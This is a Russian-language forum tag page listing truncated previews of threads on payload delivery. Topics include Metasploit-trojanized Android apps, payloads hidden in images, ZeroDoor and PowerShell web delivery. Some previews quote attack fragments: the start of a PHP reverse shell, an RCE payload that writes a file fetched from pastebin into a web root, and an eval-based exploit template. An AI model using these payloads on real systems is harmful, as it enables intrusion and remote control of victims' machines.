• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

payload delivery

  1. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android

    Можно использовать легитимное приложение Android в качестве трояна, чтобы использовать фактическое устройство пользователя. Причины того, почему этот тест важен при каждой оценке безопасности Android, заключается в том, что он позволит тестеру определить, существуют ли определенные защиты вокруг...
  2. Zer0must2b

    Гостевая статья Внедрение полезных нагрузок Metasploit в приложения для Android - вручную

    Большинству приложений Android не хватает достаточной защиты вокруг двоичного файла, и поэтому злоумышленник может легко троянизировать легитимное приложение с вредоносными нагрузками. Это одна из причин того, что мобильное вредоносное ПО так быстро распространяется в телефонах Android. При...
  3. M

    jpg +payload php

    Прохожу интересный CTF и там возможность подгрузить только jpg, проверка на jpg судя по всему идет на сервере, т.к. попытки подмены понятий через burp не проходят. Создал через FatRat стандартную php нагрузку /*<?php /**/ error_reporting(0); $ip = '192.168.168.168'; $port = 6969; if (($f =...
  4. G

    Статья Доставляем пейлоад через картинку

    Привет привет codeby, сегодня я расскажу вам про то как спрятать payload в картинке. Меня кстати Ghost Pants зовут. Данная статья является переводом с изменением данной статьи Peerlyst Приступаем: Это картинка, обычная совсем не подозрительная картинка. А если приблизить? Мы видим наш...
  5. G

    Статья Передаём пейлоад по wi-fi

    Привет любимый codeby, с вами Ghost Pants и сегодня мы поговорим о загрузке пейлоада через wi-fi. Данная статья является переводом с внесением корректив вот этой статьи Peerlyst. Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения...
  6. K

    payload

    Привет народ!! это часть эксплойта ,где пайлд! подскаите чем сгенерировать мне свой пайлод? и как правильно все указать? def generate(payload): php_payload = "eval({0})".format(toCharCode(payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template =...
  7. K

    payload

    Привет возник такой в эксплойтах типа RCE используют пайлоды , вот пример создания страницы пхп с Hacked by pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.php','w+'),file_get_contents('http://pastebin.com/raw/pYetDreV'))...
  8. Vander

    ZeroDoor - Генератор полезных нагрузок

    Привет, предлагаю обратить ваше внимание, на очередной, достаточно свежий инструмент, для создания полезных нагрузок, и дальнейшей эксплуатации ее, в качестве Remote Administration Tool. Zero Door Backdoor Generator. Установка: > git clone https://github.com/Souhardya/Zerodoor > cd...
  9. <~DarkNode~>

    Статья PowerShell для хакера (часть IV) [Web Delivery] - доставка полезной нагрузки через Web

    Часть 4 Предыдущая часть Следующая часть Все части Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я...